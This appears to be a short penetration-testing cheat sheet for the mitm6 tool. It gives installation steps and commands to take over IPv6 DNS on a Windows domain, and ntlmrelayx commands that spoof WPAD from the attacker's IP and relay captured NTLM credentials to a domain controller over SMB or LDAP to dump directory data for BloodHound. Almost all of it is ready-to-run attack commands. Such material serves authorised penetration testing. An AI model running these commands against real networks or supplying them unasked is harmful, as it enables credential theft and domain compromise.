# mitm6

## Installation

$ git clone <https://github.com/fox-it/mitm6.git>

$ cd mitm6

$ pip install .

$ mitm6 -d \<domain>

## USE WITH NTLMRELAYX

Notice the IPv6 address as a DNS server. Now the real vulnerability is that Windows prefers IPv6 over IPv4, meaning I now control DNS. So now we leverage the fact that we control DNS with spoofing WPAD answers again via ntlmrelayx.py. I wrote a guide on how to set it up here. With mitm6 running in one window, open another and run ntlmrelayx.py.&#x20;

$ ntlmrelayx.py -wh \<Attacker IP> -t smb://\<Domain Controller>/

OR

$ ntlmrelayx.py -t ldap\://\<IP of DC>/

-wh: Server hosting WPAD file (Attacker’s IP)

-t: Target (You cannot relay credentials to the same device that you’re spoofing)

WIth the second command, it can dump loot which can be used to run up bloodhound!

{% embed url="<https://github.com/dirkjanm/mitm6>" %}